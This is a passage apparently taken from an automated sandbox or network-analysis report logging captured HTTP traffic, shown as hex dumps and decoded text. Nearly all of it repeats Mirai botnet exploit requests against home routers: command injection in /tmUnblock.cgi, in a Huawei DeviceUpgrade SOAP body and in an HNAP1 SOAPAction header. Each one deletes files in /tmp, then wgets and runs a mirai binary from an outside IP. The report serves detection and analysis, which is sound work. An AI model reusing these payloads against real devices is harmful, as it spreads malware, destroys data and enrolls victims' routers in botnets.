73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 